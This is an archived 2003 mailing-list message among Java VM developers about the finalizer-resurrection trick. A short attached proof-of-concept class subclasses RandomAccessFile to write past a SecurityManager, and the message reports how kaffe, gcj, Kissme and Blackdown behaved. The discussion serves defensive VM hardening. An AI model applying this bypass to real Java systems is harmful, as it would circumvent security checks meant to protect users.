[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: Small ZipFile patch

From: Mark Wielaard
Subject: RE: Small ZipFile patch
Date: 04 Mar 2003 23:56:26 +0100


On Tue, 2003-03-04 at 23:16, Jeroen Frijters wrote:
> Yep. You can do some very tricky things with this. For every non-final
> class with a non-final finalize it is possible to obtain an initialized
> reference to an instance of that class *without* running a constructor
> by taking advantage of the fact that the finalizer runs even if the
> constructor was never invoked.

Ugh. That is terrible for trying to keep some sane security framework.
I tried the attached class which overrides RandomAccessFile. It first
installs a SecurityManager to prevent the class from actually writing to
some file, but then tries anyway by using the back-from-dead object
returned by the finalizer. The results are interesting:

kaffe 1.0.7 doesn't throw any exceptions but also doesn't write to the

Kissme CVS+Classpath CVS correctly throws SecurityException then dumps

gij from CVS gives the interesting:

Exception in thread "main" java.lang.ExceptionInInitializerError
*** Got java.lang.NoClassDefFoundError: gnu.gcj.runtime.NameFinder while
to print stack trace.

Blackdown-1.4.1-beta correctly gives AccessControlException and then:

Unexpected Signal : 11 occurred at PC=0x403A264C


Good night,


public class IRAF extends RandomAccessFile
    static RandomAccessFile raf;

    IRAF(String file) throws IOException
      super(file, "rw");

    protected void finalize()
      raf = this;

    public static void main(String args[])
      System.setSecurityManager(new SecurityManager());
      try { new IRAF(args[0]); } catch (Throwable t) { t.printStackTrace(); }

      while (raf == null)
        new Object(); // Generate some garbage till the finalizer triggers.

      try { raf.write(0xff); } catch (Throwable t) { t.printStackTrace(); }

reply via email to

[Prev in Thread] Current Thread [Next in Thread]